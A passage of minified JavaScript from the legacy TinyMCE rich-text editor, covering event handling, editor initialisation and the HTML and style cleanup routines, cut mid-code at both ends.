elm=tinyMCE.selectedInstance.getFocusElement();tinyMCE.linkElement=tinyMCE.getParentElement(elm,"a");tinyMCE.imgElement=tinyMCE.getParentElement(elm,"img");tinyMCE.selectedElement=elm;if(tinyMCE.isGecko&&e.type=="keyup"&&e.keyCode==9)tinyMCE.handleVisualAid(tinyMCE.selectedInstance.getBody(),true,tinyMCE.settings['visual'],tinyMCE.selectedInstance);if(tinyMCE.isGecko&&tinyMCE.settings['document_base_url']!=""+document.location.href&&e.type=="keyup"&&e.ctrlKey&&e.keyCode==86)tinyMCE.selectedInstance.fixBrokenURLs();if(tinyMCE.isMSIE&&e.type=="keydown"&&e.keyCode==13)tinyMCE.enterKeyElement=tinyMCE.selectedInstance.getFocusElement();if(tinyMCE.isMSIE&&e.type=="keyup"&&e.keyCode==13){var elm=tinyMCE.enterKeyElement;if(elm){var re=new RegExp('^HR|IMG|BR$','g');var dre=new RegExp('^H[1-6]$','g');if(!elm.hasChildNodes()&&!re.test(elm.nodeName)){if(dre.test(elm.nodeName))elm.innerHTML="&nbsp;&nbsp;";else elm.innerHTML="&nbsp;";}}}var keys=tinyMCE.posKeyCodes;var posKey=false;for(var i=0;i<keys.length;i++){if(keys[i]==e.keyCode){posKey=true;break;}}if(tinyMCE.isMSIE&&tinyMCE.settings['custom_undo_redo']){var keys=new Array(8,46);for(var i=0;i<keys.length;i++){if(keys[i]==e.keyCode){if(e.type=="keyup")tinyMCE.triggerNodeChange(false);}}if(tinyMCE.settings['custom_undo_redo_keyboard_shortcuts']){if(e.keyCode==90&&(e.ctrlKey&&!e.altKey)&&e.type=="keydown"){tinyMCE.selectedInstance.execCommand("Undo");tinyMCE.triggerNodeChange(false);}if(e.keyCode==89&&(e.ctrlKey&&!e.altKey)&&e.type=="keydown"){tinyMCE.selectedInstance.execCommand("Redo");tinyMCE.triggerNodeChange(false);}if((e.keyCode==90||e.keyCode==89)&&(e.ctrlKey&&!e.altKey)){e.returnValue=false;e.cancelBubble=true;return false;}}}if(!posKey&&e.type=="keyup")tinyMCE.execCommand("mceStartTyping");if(e.type=="keyup"&&(posKey||e.ctrlKey))tinyMCE.execCommand("mceEndTyping");if(posKey&&e.type=="keyup")tinyMCE.triggerNodeChange(false);if(tinyMCE.isMSIE&&e.ctrlKey)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);break;case "mousedown":case "mouseup":case "click":case "focus":if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();var targetBody=tinyMCE.getParentElement(e.target,"body");for(var instanceName in tinyMCE.instances){if(!tinyMCE.isInstance(tinyMCE.instances[instanceName]))continue;var inst=tinyMCE.instances[instanceName];inst.autoResetDesignMode();if(inst.getBody()==targetBody){tinyMCE.selectedInstance=inst;tinyMCE.selectedElement=e.target;tinyMCE.linkElement=tinyMCE.getParentElement(tinyMCE.selectedElement,"a");tinyMCE.imgElement=tinyMCE.getParentElement(tinyMCE.selectedElement,"img");break;}}if(tinyMCE.isSafari){tinyMCE.selectedInstance.lastSafariSelection=tinyMCE.selectedInstance.getBookmark();tinyMCE.selectedInstance.lastSafariSelectedElement=tinyMCE.selectedElement;var lnk=tinyMCE.getParentElement(tinyMCE.selectedElement,"a");if(lnk&&e.type=="mousedown"){lnk.setAttribute("mce_real_href",lnk.getAttribute("href"));lnk.setAttribute("href","javascript:void(0);");}if(lnk&&e.type=="click"){window.setTimeout(function(){lnk.setAttribute("href",lnk.getAttribute("mce_real_href"));lnk.removeAttribute("mce_real_href");},10);}}if(e.type!="focus")tinyMCE.selectedNode=null;tinyMCE.triggerNodeChange(false);tinyMCE.execCommand("mceEndTyping");if(e.type=="mouseup")tinyMCE.execCommand("mceAddUndoLevel");if(!tinyMCE.selectedInstance&&e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];if(tinyMCE.isGecko&&tinyMCE.settings['document_base_url']!=""+document.location.href)window.setTimeout('tinyMCE.getInstanceById("'+inst.editorId+'").fixBrokenURLs();',10);return false;break;}};TinyMCE.prototype.switchClass=function(element,class_name,lock_state){var lockChanged=false;if(typeof(lock_state)!="undefined"&&element!=null){element.classLock=lock_state;lockChanged=true;}if(element!=null&&(lockChanged||!element.classLock)){element.oldClassName=element.className;element.className=class_name;}};TinyMCE.prototype.restoreAndSwitchClass=function(element,class_name){if(element!=null&&!element.classLock){this.restoreClass(element);this.switchClass(element,class_name);}};TinyMCE.prototype.switchClassSticky=function(element_name,class_name,lock_state){var element,lockChanged=false;if(!this.stickyClassesLookup[element_name])this.stickyClassesLookup[element_name]=document.getElementById(element_name);element=this.stickyClassesLookup[element_name];if(typeof(lock_state)!="undefined"&&element!=null){element.classLock=lock_state;lockChanged=true;}if(element!=null&&(lockChanged||!element.classLock)){element.className=class_name;element.oldClassName=class_name;if(tinyMCE.isOpera){if(class_name=="mceButtonDisabled"){var suffix="";if(!element.mceOldSrc)element.mceOldSrc=element.src;if(this.operaOpacityCounter>-1)suffix='?rnd='+this.operaOpacityCounter++;element.src=tinyMCE.baseURL+"/themes/"+tinyMCE.getParam("theme")+"/images/opacity.png"+suffix;element.style.backgroundImage="url('"+element.mceOldSrc+"')";}else{if(element.mceOldSrc){element.src=element.mceOldSrc;element.parentNode.style.backgroundImage="";element.mceOldSrc=null;}}}}};TinyMCE.prototype.restoreClass=function(element){if(element!=null&&element.oldClassName&&!element.classLock){element.className=element.oldClassName;element.oldClassName=null;}};TinyMCE.prototype.setClassLock=function(element,lock_state){if(element!=null)element.classLock=lock_state;};TinyMCE.prototype.addEvent=function(obj,name,handler){if(tinyMCE.isMSIE){obj.attachEvent("on"+name,handler);}else obj.addEventListener(name,handler,false);};TinyMCE.prototype.submitPatch=function(){tinyMCE.removeTinyMCEFormElements(this);tinyMCE.triggerSave();this.mceOldSubmit();tinyMCE.isNotDirty=true;};TinyMCE.prototype.onLoad=function(){for(var c=0;c<tinyMCE.configs.length;c++){tinyMCE.settings=tinyMCE.configs[c];var selector=tinyMCE.getParam("editor_selector");var deselector=tinyMCE.getParam("editor_deselector");var elementRefAr=new Array();if(document.forms&&tinyMCE.settings['add_form_submit_trigger']&&!tinyMCE.submitTriggers){for(var i=0;i<document.forms.length;i++){var form=document.forms[i];tinyMCE.addEvent(form,"submit",TinyMCE.prototype.handleEvent);tinyMCE.addEvent(form,"reset",TinyMCE.prototype.handleEvent);tinyMCE.submitTriggers=true;if(tinyMCE.settings['submit_patch']){try{form.mceOldSubmit=form.submit;form.submit=TinyMCE.prototype.submitPatch;}catch(e){}}}}var mode=tinyMCE.settings['mode'];switch(mode){case "exact":var elements=tinyMCE.getParam('elements','',true,',');for(var i=0;i<elements.length;i++){var element=tinyMCE._getElementById(elements[i]);var trigger=element?element.getAttribute(tinyMCE.settings['textarea_trigger']):"";if(tinyMCE.getAttrib(element,"class").indexOf(deselector)!=-1)continue;if(trigger=="false")continue;if(tinyMCE.settings['ask']&&element){elementRefAr[elementRefAr.length]=element;continue;}if(element)tinyMCE.addMCEControl(element,elements[i]);else if(tinyMCE.settings['debug'])alert("Error: Could not find element by id or name: "+elements[i]);}break;case "specific_textareas":case "textareas":var nodeList=document.getElementsByTagName("textarea");for(var i=0;i<nodeList.length;i++){var elm=nodeList.item(i);var trigger=elm.getAttribute(tinyMCE.settings['textarea_trigger']);if(selector!=''&&tinyMCE.getAttrib(elm,"class").indexOf(selector)==-1)continue;if(tinyMCE.getAttrib(elm,"class").indexOf(deselector)!=-1)continue;if((mode=="specific_textareas"&&trigger=="true")||(mode=="textareas"&&trigger!="false"))elementRefAr[elementRefAr.length]=elm;}break;}for(var i=0;i<elementRefAr.length;i++){var element=elementRefAr[i];var elementId=element.name?element.name:element.id;if(tinyMCE.settings['ask']){if(tinyMCE.isGecko){var settings=tinyMCE.settings;tinyMCE.addEvent(element,"focus",function(e){window.setTimeout(function(){TinyMCE.prototype.confirmAdd(e,settings);},10);});}else{var settings=tinyMCE.settings;tinyMCE.addEvent(element,"focus",function(){TinyMCE.prototype.confirmAdd(null,settings);});}}else tinyMCE.addMCEControl(element,elementId);}if(tinyMCE.settings['auto_focus']){window.setTimeout(function(){var inst=tinyMCE.getInstanceById(tinyMCE.settings['auto_focus']);inst.selectNode(inst.getBody(),true,true);inst.contentWindow.focus();},10);}tinyMCE.executeCallback('oninit','_oninit',0);}};TinyMCE.prototype.removeMCEControl=function(editor_id){var inst=tinyMCE.getInstanceById(editor_id);if(inst){inst.switchSettings();editor_id=inst.editorId;var html=tinyMCE.getContent(editor_id);var tmpInstances=new Array();for(var instanceName in tinyMCE.instances){var instance=tinyMCE.instances[instanceName];if(!tinyMCE.isInstance(instance))continue;if(instanceName!=editor_id)tmpInstances[instanceName]=instance;}tinyMCE.instances=tmpInstances;tinyMCE.selectedElement=null;tinyMCE.selectedInstance=null;var replaceElement=document.getElementById(editor_id+"_parent");var oldTargetElement=inst.oldTargetElement;var targetName=oldTargetElement.nodeName.toLowerCase();if(targetName=="textarea"||targetName=="input"){replaceElement.parentNode.removeChild(replaceElement);oldTargetElement.style.display="inline";oldTargetElement.value=html;}else{oldTargetElement.innerHTML=html;replaceElement.parentNode.insertBefore(oldTargetElement,replaceElement);replaceElement.parentNode.removeChild(replaceElement);}}};TinyMCE.prototype._cleanupElementName=function(element_name,element){var name="";element_name=element_name.toLowerCase();if(element_name=="body")return null;if(tinyMCE.cleanup_verify_html){for(var i=0;i<tinyMCE.cleanup_invalidElements.length;i++){if(tinyMCE.cleanup_invalidElements[i]==element_name)return null;}var validElement=false;var elementAttribs=null;for(var i=0;i<tinyMCE.cleanup_validElements.length&&!elementAttribs;i++){for(var x=0,n=tinyMCE.cleanup_validElements[i][0].length;x<n;x++){var elmMatch=tinyMCE.cleanup_validElements[i][0][x];if(elmMatch.charAt(0)=='+'||elmMatch.charAt(0)=='-')elmMatch=elmMatch.substring(1);if(elmMatch.match(new RegExp('\\*|\\?|\\+','g'))!=null){elmMatch=elmMatch.replace(new RegExp('\\?','g'),'(\\S?)');elmMatch=elmMatch.replace(new RegExp('\\+','g'),'(\\S+)');elmMatch=elmMatch.replace(new RegExp('\\*','g'),'(\\S*)');elmMatch="^"+elmMatch+"$";if(element_name.match(new RegExp(elmMatch,'g'))){elementAttribs=tinyMCE.cleanup_validElements[i];validElement=true;break;}}if(element_name==elmMatch){elementAttribs=tinyMCE.cleanup_validElements[i];validElement=true;element_name=elementAttribs[0][0];break;}}}if(!validElement)return null;}if(element_name.charAt(0)=='+'||element_name.charAt(0)=='-')name=element_name.substring(1);if(!tinyMCE.isMSIE){if(name=="strong"&&!tinyMCE.cleanup_on_save)element_name="b";else if(name=="em"&&!tinyMCE.cleanup_on_save)element_name="i";}var elmData=new Object();elmData.element_name=element_name;elmData.valid_attribs=elementAttribs;return elmData;};TinyMCE.prototype._moveStyle=function(elm,style,attrib){if(tinyMCE.cleanup_inline_styles){var val=tinyMCE.getAttrib(elm,attrib);if(val!=''){val=''+val;switch(attrib){case "background":val="url('"+val+"');";break;case "bordercolor":if(elm.style.borderStyle==''||elm.style.borderStyle=='none')elm.style.borderStyle='solid';break;case "border":case "width":case "height":if(attrib=="border"&&elm.style.borderWidth>0)return;if(val.indexOf('%')==-1)val+='px';break;case "vspace":case "hspace":elm.style.marginTop=val+"px";elm.style.marginBottom=val+"px";elm.removeAttribute(attrib);return;case "align":if(elm.nodeName=="IMG"){if(tinyMCE.isMSIE)elm.style.styleFloat=val;else elm.style.cssFloat=val;}else elm.style.textAlign=val;elm.removeAttribute(attrib);return;}if(val!=''){eval('elm.style.'+style+' = val;');elm.removeAttribute(attrib);}}}else{if(style=='')return;var val=eval('elm.style.'+style)==''?tinyMCE.getAttrib(elm,attrib):eval('elm.style.'+style);val=val==null?'':''+val;switch(attrib){case "background":if(val.indexOf('url')==-1&&val!='')val="url('"+val+"');";if(val!=''){elm.style.backgroundImage=val;elm.removeAttribute(attrib);}return;case "border":case "width":case "height":val=val.replace('px','');break;case "align":if(tinyMCE.getAttrib(elm,'align')==''){if(elm.nodeName=="IMG"){if(tinyMCE.isMSIE&&elm.style.styleFloat!=''){val=elm.style.styleFloat;style='styleFloat';}else if(tinyMCE.isGecko&&elm.style.cssFloat!=''){val=elm.style.cssFloat;style='cssFloat';}}}break;}if(val!=''){elm.removeAttribute(attrib);elm.setAttribute(attrib,val);eval('elm.style.'+style+' = "";');}}};TinyMCE.prototype._cleanupAttribute=function(valid_attributes,element_name,attribute_node,element_node){var attribName=attribute_node.nodeName.toLowerCase();var attribValue=attribute_node.nodeValue;var attribMustBeValue=null;var verified=false;if(attribName.indexOf('moz_')!=-1)return null;if(!tinyMCE.isMSIE&&(attribName=="mce_real_href"||attribName=="mce_real_src")){if(!tinyMCE.cleanup_on_save){var attrib=new Object();attrib.name=attribName;attrib.value=attribValue;return attrib;}else return null;}if(tinyMCE.cleanup_verify_html&&!verified){for(var i=1;i<valid_attributes.length;i++){var attribMatch=valid_attributes[i][0];var re=null;if(attribMatch.match(new RegExp('\\*|\\?|\\+','g'))!=null){attribMatch=attribMatch.replace(new RegExp('\\?','g'),'(\\S?)');attribMatch=attribMatch.replace(new RegExp('\\+','g'),'(\\S+)');attribMatch=attribMatch.replace(new RegExp('\\*','g'),'(\\S*)');attribMatch="^"+attribMatch+"$";re=new RegExp(attribMatch,'g');}if((re&&attribName.match(re)!=null)||attribName==attribMatch){verified=true;attribMustBeValue=valid_attributes[i][3];break;}}if(!verified)return false;}else verified=true;switch(attribName){case "size":if(tinyMCE.isMSIE5&&element_name=="font")attribValue=element_node.size;break;case "width":case "height":case "border":if(tinyMCE.isMSIE5)attribValue=eval("element_node."+attribName);break;case "shape":attribValue=attribValue.toLowerCase();break;case "cellspacing":if(tinyMCE.isMSIE5)attribValue=element_node.cellSpacing;break;case "cellpadding":if(tinyMCE.isMSIE5)attribValue=element_node.cellPadding;break;case "color":if(tinyMCE.isMSIE5&&element_name=="font")attribValue=element_node.color;break;case "class":if(tinyMCE.cleanup_on_save&&attribValue.indexOf('mceItemAnchor')!=-1)attribValue=attribValue.replace(/mceItem[a-z0-9]+/gi,'');if(element_name=="table"||element_name=="td"){if(tinyMCE.cleanup_visual_table_class!="")attribValue=tinyMCE.getVisualAidClass(attribValue,!tinyMCE.cleanup_on_save);}if(!tinyMCE._verifyClass(element_node)||attribValue=="")return null;break;case "onfocus":case "onblur":case "onclick":case "ondblclick":case "onmousedown":case "onmouseup":case "onmouseover":case "onmousemove":case "onmouseout":case "onkeypress":case "onkeydown":case "onkeydown":case "onkeyup":attribValue=tinyMCE.cleanupEventStr(""+attribValue);if(attribValue.indexOf('return false;')==0)attribValue=attribValue.substring(14);break;case "style":attribValue=tinyMCE.serializeStyle(tinyMCE.parseStyle(tinyMCE.getAttrib(element_node,"style")));break;case "href":case "src":if(tinyMCE.isGecko18&&attribName=="src")attribValue=element_node.src;if(!tinyMCE.isMSIE&&attribName=="href"&&element_node.getAttribute("mce_real_href"))attribValue=element_node.getAttribute("mce_real_href");if(!tinyMCE.isMSIE&&attribName=="src"&&element_node.getAttribute("mce_real_src"))attribValue=element_node.getAttribute("mce_real_src");if(tinyMCE.isGecko&&!tinyMCE.getParam('relative_urls'))attribValue=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],attribValue);attribValue=eval(tinyMCE.cleanup_urlconverter_callback+"(attribValue, element_node, tinyMCE.cleanup_on_save);");break;case "colspan":case "rowspan":if(attribValue=="1")return null;break;case "_moz-userdefined":case "editorid":case "mce_real_href":case "mce_real_src":return null;}if(attribMustBeValue!=null){var isCorrect=false;for(var i=0;i<attribMustBeValue.length;i++){if(attribValue==attribMustBeValue[i]){isCorrect=true;break;}}if(!isCorrect)return null;}var attrib=new Object();attrib.name=attribName;attrib.value=attribValue;return attrib;};TinyMCE.prototype.clearArray=function(ar){for(var key in ar)ar[key]=null;};TinyMCE.prototype.isInstance=function(inst){return inst!=null&&typeof(inst)=="object"&&inst.isTinyMCEControl;};TinyMCE.prototype.parseStyle=function(str){var ar=new Array();if(str==null)return ar;var st=str.split(';');tinyMCE.clearArray(ar);for(var i=0;i<st.length;i++){if(st[i]=='')continue;var re=new RegExp('^\\s*([^:]*):\\s*(.*)\\s*$');var pa=st[i].replace(re,'$1||$2').split('||');if(pa.length==2)ar[pa[0].toLowerCase()]=pa[1];}return ar;};TinyMCE.prototype.compressStyle=function(ar,pr,sf,res){var box=new Array();box[0]=ar[pr+'-top'+sf];box[1]=ar[pr+'-left'+sf];box[2]=ar[pr+'-right'+sf];box[3]=ar[pr+'-bottom'+sf];for(var i=0;i<box.length;i++){if(box[i]==null)return;for(var a=0;a<box.length;a++){if(box[a]!=box[i])return;}}ar[res]=box[0];ar[pr+'-top'+sf]=null;ar[pr+'-left'+sf]=null;ar[pr+'-right'+sf]=null;ar[pr+'-bottom'+sf]=null;};TinyMCE.prototype.serializeStyle=function(ar){var str="";tinyMCE.compressStyle(ar,"border","","border");tinyMCE.compressStyle(ar,"border","-width","border-width");tinyMCE.compressStyle(ar,"border","-color","border-color");for(var key in ar){var val=ar[key];if(typeof(val)=='function')continue;if(val!=null&&val!=''){val=''+val;val=val.replace(new RegExp("url\\(\\'?([^\\']*)\\'?\\)",'gi'),"url('$1')");if(tinyMCE.getParam("force_hex_style_colors"))val=tinyMCE.convertRGBToHex(val);if(val!="url('')")str+=key.toLowerCase()+": "+val+"; ";}}if(new RegExp('; $').test(str))str=str.substring(0,str.length-2);return str;};TinyMCE.prototype.convertRGBToHex=function(s){if(s.toLowerCase().indexOf('rgb')!=-1){var re=new RegExp("rgb\\s*\\(\\s*([0-9]+).*,\\s*([0-9]+).*,\\s*([0-9]+).*\\)","gi");var rgb=s.replace(re,"$1,$2,$3").split(',');if(rgb.length==3){r=parseInt(rgb[0]).toString(16);g=parseInt(rgb[1]).toString(16);b=parseInt(rgb[2]).toString(16);r=r.length==1?'0'+r:r;g=g.length==1?'0'+g:g;b=b.length==1?'0'+b:b;s="#"+r+g+b;}}return s;};TinyMCE.prototype._verifyClass=function(node){if(tinyMCE.isGecko){var className=node.getAttribute('class');if(!className)return false;}if(tinyMCE.isMSIE)var className=node.getAttribute('className');if(tinyMCE.cleanup_verify_css_classes&&tinyMCE.cleanup_on_save){var csses=tinyMCE.getCSSClasses();nonDefinedCSS=true;for(var c=0;c<csses.length;c++){if(csses[c]==className){nonDefinedCSS=false;break;}}if(nonDefinedCSS&&className.indexOf('mce_')!=0){node.removeAttribute('className');node.removeAttribute('class');return false;}}return true;};TinyMCE.prototype.cleanupNode=function(node){var output="";switch(node.nodeType){case 1:var elementData=tinyMCE._cleanupElementName(node.nodeName,node);var elementName=elementData?elementData.element_name:null;var elementValidAttribs=elementData?elementData.valid_attribs:null;var elementAttribs="";var openTag=false,nonEmptyTag=false;if(elementName!=null&&elementName.charAt(0)=='+'){elementName=elementName.substring(1);openTag=true;}if(elementName!=null&&elementName.charAt(0)=='-'){elementName=elementName.substring(1);nonEmptyTag=true;}if(tinyMCE.isMSIE&&tinyMCE.settings['fix_content_duplication']){var lookup=tinyMCE.cleanup_elementLookupTable;for(var i=0;i<lookup.length;i++){if(lookup[i]==node)return output;}lookup[lookup.length]=node;}if(!elementName){if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);}return output;}if(tinyMCE.cleanup_on_save){if(node.nodeName=="A"&&node.className=="mceItemAnchor"){if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);}return '<a name="'+this.convertStringToXML(node.getAttribute("name"))+'"></a>'+output;}}var re=new RegExp("^(TABLE|TD|TR)$");if(re.test(node.nodeName)){if((node.nodeName!="TABLE"||tinyMCE.cleanup_inline_styles)&&(width=tinyMCE.getAttrib(node,"width"))!=''){node.style.width=width.indexOf('%')!=-1?width:width.replace(/[^0-9]/gi,'')+"px";node.removeAttribute("width");}if((node.nodeName=="TABLE"&&!tinyMCE.cleanup_inline_styles)&&node.style.width!=''){tinyMCE.setAttrib(node,"width",node.style.width.replace('px',''));node.style.width='';}if((height=tinyMCE.getAttrib(node,"height"))!=''){node.style.height=height.indexOf('%')!=-1?height:height.replace(/[^0-9]/gi,'')+"px";node.removeAttribute("height");}}if(tinyMCE.cleanup_inline_styles){var re=new RegExp("^(TABLE|TD|TR|IMG|HR)$");if(re.test(node.nodeName)){tinyMCE._moveStyle(node,'width','width');tinyMCE._moveStyle(node,'height','height');tinyMCE._moveStyle(node,'borderWidth','border');tinyMCE._moveStyle(node,'','vspace');tinyMCE._moveStyle(node,'','hspace');tinyMCE._moveStyle(node,'textAlign','align');tinyMCE._moveStyle(node,'backgroundColor','bgColor');tinyMCE._moveStyle(node,'borderColor','borderColor');tinyMCE._moveStyle(node,'backgroundImage','background');if(tinyMCE.isMSIE5)node.outerHTML=node.outerHTML;}else if(tinyMCE.isBlockElement(node))tinyMCE._moveStyle(node,'textAlign','align');if(node.nodeName=="FONT")tinyMCE._moveStyle(node,'color','color');}if(elementValidAttribs){for(var a=1;a<elementValidAttribs.length;a++){var attribName,attribDefaultValue,attribForceValue,attribValue;attribName=elementValidAttribs[a][0];attribDefaultValue=elementValidAttribs[a][1];attribForceValue=elementValidAttribs[a][2];if(attribDefaultValue!=null||attribForceValue!=null){var attribValue=node.getAttribute(attribName);if(node.getAttribute(attribName)==null||node.getAttribute(attribName)=="")attribValue=attribDefaultValue;attribValue=attribForceValue?attribForceValue:attribValue;if(attribValue=="{$uid}")attribValue="uid_"+(tinyMCE.cleanup_idCount++);if(attribName=="class")attribValue=tinyMCE.getVisualAidClass(attribValue,tinyMCE.cleanup_on_save);node.setAttribute(attribName,attribValue);}}}if((tinyMCE.isMSIE&&!tinyMCE.isOpera)&&elementName=="style")return "<style>"+node.innerHTML+"</style>";if(elementName=="table"&&!node.hasChildNodes())return "";if(node.attributes.length>0){var lastAttrib="";for(var i=0;i<node.attributes.length;i++){if(node.attributes[i].specified){if(tinyMCE.isOpera){if(node.attributes[i].nodeName==lastAttrib)continue;lastAttrib=node.attributes[i].nodeName;}var attrib=tinyMCE._cleanupAttribute(elementValidAttribs,elementName,node.attributes[i],node);if(attrib&&attrib.value!="")elementAttribs+=" "+attrib.name+"="+'"'+this.convertStringToXML(""+attrib.value)+'"';}}}if(tinyMCE.isMSIE&&elementName=="table"&&node.getAttribute("summary")!=null&&elementAttribs.indexOf('summary')==-1){var summary=tinyMCE.getAttrib(node,'summary');if(summary!='')elementAttribs+=" summary="+'"'+this.convertStringToXML(summary)+'"';}if(tinyMCE.isMSIE5&&/^(td|img|a)$/.test(elementName)){var ma=new Array("scope","longdesc","hreflang","charset","type");for(var u=0;u<ma.length;u++){if(node.getAttribute(ma[u])!=null){var s=tinyMCE.getAttrib(node,ma[u]);if(s!='')elementAttribs+=" "+ma[u]+"="+'"'+this.convertStringToXML(s)+'"';}}}if(tinyMCE.isMSIE&&elementName=="input"){if(node.type){if(!elementAttribs.match(/type=/g))elementAttribs+=" type="+'"'+node.type+'"';}if(node.value){if(!elementAttribs.match(/value=/g))elementAttribs+=" value="+'"'+node.value+'"';}}if((elementName=="p"||elementName=="td")&&(node.innerHTML==""||node.innerHTML=="&nbsp;"))return "<"+elementName+elementAttribs+">"+this.convertStringToXML(String.fromCharCode(160))+"</"+elementName+">";if(tinyMCE.isMSIE&&elementName=="script")return "<"+elementName+elementAttribs+">"+node.text+"</"+elementName+">";if(node.hasChildNodes()){if(!(elementName=="span"&&elementAttribs==""&&tinyMCE.getParam("trim_span_elements"))){if(elementName=="p"&&tinyMCE.cleanup_force_br_newlines)output+="<div"+elementAttribs+">";else output+="<"+elementName+elementAttribs+">";}for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);if(!(elementName=="span"&&elementAttribs==""&&tinyMCE.getParam("trim_span_elements"))){if(elementName=="p"&&tinyMCE.cleanup_force_br_newlines)output+="</div><br />";else output+="</"+elementName+">";}}else{if(!nonEmptyTag){if(openTag)output+="<"+elementName+elementAttribs+"></"+elementName+">";else output+="<"+elementName+elementAttribs+" />";}}return output;case 3:if(node.parentNode.nodeName=="SCRIPT"||node.parentNode.nodeName=="STYLE")return node.nodeValue;return this.convertStringToXML(node.nodeValue);case 8:return "<!--"+node.nodeValue+"-->";default:return "[UNKNOWN NODETYPE "+node.nodeType+"]";}};TinyMCE.prototype.convertStringToXML=function(html_data){var output="";for(var i=0;i<html_data.length;i++){var chr=html_data.charCodeAt(i);if(tinyMCE.settings['entity_encoding']=="numeric"){if(chr>127)output+='&#'+chr+";";else output+=String.fromCharCode(chr);continue;}if(tinyMCE.settings['entity_encoding']=="raw"){output+=String.fromCharCode(chr);continue;}if(typeof(tinyMCE.cleanup_entities["c"+chr])!='undefined'&&tinyMCE.cleanup_entities["c"+chr]!='')output+='&'+tinyMCE.cleanup_entities["c"+chr]+';';else output+=''+String.fromCharCode(chr);}return output;};TinyMCE.prototype._getCleanupElementName=function(chunk){var pos;if(chunk.charAt(0)=='+')chunk=chunk.substring(1);if(chunk.charAt(0)=='-')chunk=chunk.substring(1);if((pos=chunk.indexOf('/'))!=-1)chunk=chunk.substring(0,pos);if((pos=chunk.indexOf('['))!=-1)chunk=chunk.substring(0,pos);return chunk;};TinyMCE.prototype._initCleanup=function(){var validElements=tinyMCE.settings["valid_elements"];validElements=validElements.split(',');var extendedValidElements=tinyMCE.settings["extended_valid_elements"];extendedValidElements=extendedValidElements.split(',');for(var i=0;i<extendedValidElements.length;i++){var elementName=this._getCleanupElementName(extendedValidElements[i]);var skipAdd=false;for(var x=0;x<validElements.length;x++){if(this._getCleanupElementName(validElements[x])==elementName){validElements[x]=extendedValidElements[i];skipAdd=true;break;}}if(!skipAdd)validElements[validElements.length]=extendedValidElements[i];}for(var i=0;i<validElements.length;i++){var item=validElements[i];item=item.replace('[','|');item=item.replace(']','');var attribs=item.split('|');for(var x=0;x<attribs.length;x++)attribs[x]=attribs[x].toLowerCase();attribs[0]=attribs[0].split('/');for(var x=1;x<attribs.length;x++){var attribName=attribs[x];var attribDefault=null;var attribForce=null;var attribMustBe=null;if((pos=attribName.indexOf('='))!=-1){attribDefault=attribName.substring(pos+1);attribName=attribName.substring(0,pos);}if((pos=attribName.indexOf(':'))!=-1){attribForce=attribName.substring(pos+1);attribName=attribName.substring(0,pos);}if((pos=attribName.indexOf('<'))!=-1){attribMustBe=attribName.substring(pos+1).split('?');attribName=attribName.substring(0,pos);}attribs[x]=new Array(attribName,attribDefault,attribForce,attribMustBe);}validElements[i]=attribs;}var invalidElements=tinyMCE.settings['invalid_elements'].split(',');for(var i=0;i<invalidElements.length;i++)invalidElements[i]=invalidElements[i].toLowerCase();tinyMCE.settings['cleanup_validElements']=validElements;tinyMCE.settings['cleanup_invalidElements']=invalidElements;tinyMCE.settings['cleanup_entities']=new Array();var entities=tinyMCE.getParam('entities','',true,',');for(var i=0;i<entities.length;i+=2)tinyMCE.settings['cleanup_entities']['c'+entities[i]]=entities[i+1];};TinyMCE.prototype._cleanupHTML=function(inst,doc,config,element,visual,on_save){if(!tinyMCE.settings['cleanup'])return element.innerHTML;if(on_save&&tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertFontsToSpans(doc);tinyMCE._customCleanup(inst,on_save?"get_from_editor_dom":"insert_to_editor_dom",doc.body);tinyMCE.cleanup_validElements=tinyMCE.settings['cleanup_validElements'];tinyMCE.cleanup_entities=tinyMCE.settings['cleanup_entities'];tinyMCE.cleanup_invalidElements=tinyMCE.settings['cleanup_invalidElements'];tinyMCE.cleanup_verify_html=tinyMCE.settings['verify_html'];tinyMCE.cleanup_force_br_newlines=tinyMCE.settings['force_br_newlines'];tinyMCE.cleanup_urlconverter_callback=tinyMCE.settings['urlconverter_callback'];tinyMCE.cleanup_verify_css_classes=tinyMCE.settings['verify_css_classes'];tinyMCE.cleanup_visual_table_class=tinyMCE.settings['visual_table_class'];tinyMCE.cleanup_apply_source_formatting=tinyMCE.settings['apply_source_formatting'];tinyMCE.cleanup_inline_styles=tinyMCE.settings['inline_styles'];tinyMCE.cleanup_visual_aid=visual;tinyMCE.cleanup_on_save=on_save;tinyMCE.cleanup_idCount=0;tinyMCE.cleanup_elementLookupTable=new Array();var startTime=new Date().getTime();if(tinyMCE.isMSIE){var nodes=element.getElementsByTagName("hr");for(var i=0;i<nodes.length;i++){if(nodes[i].id=="null")nodes[i].removeAttribute("id");}tinyMCE.setInnerHTML(element,tinyMCE.regexpReplace(element.innerHTML,'<p>[ \n\r]*<hr.*>[ \n\r]*</p>','<hr />','gi'));tinyMCE.setInnerHTML(element,tinyMCE.regexpReplace(element.innerHTML,'<!([^-(DOCTYPE)]* )|<!/[^-]*>','','gi'));}var html=this.cleanupNode(element);if(tinyMCE.settings['debug'])tinyMCE.debug("Cleanup process executed in: "+(new Date().getTime()-startTime)+" ms.");html=tinyMCE.regexpReplace(html,'<p><hr /></p>','<hr />');html=tinyMCE.regexpReplace(html,'<p>&nbsp;</p><hr /><p>&nbsp;</p>','<hr />');html=tinyMCE.regexpReplace(html,'<td>\\s*<br />\\s*</td>','<td>&nbsp;</td>');html=tinyMCE.regexpReplace(html,'<p>\\s*<br />\\s*</p>','<p>&nbsp;</p>');html=tinyMCE.regexpReplace(html,'<p>\\s*&nbsp;\\s*<br />\\s*&nbsp;\\s*</p>','<p>&nbsp;</p>');html=tinyMCE.regexpReplace(html,'<p>\\s*&nbsp;\\s*<br />\\s*</p>','<p>&nbsp;</p>');html=tinyMCE.regexpReplace(html,'<p>\\s*<br />\\s*&nbsp;\\s*</p>','<p>&nbsp;</p>');html=html.replace(new RegExp('<a>(.*?)</a>','gi'),'$1');if(!tinyMCE.isMSIE)html=html.replace(new RegExp('<o:p _moz-userdefined="" 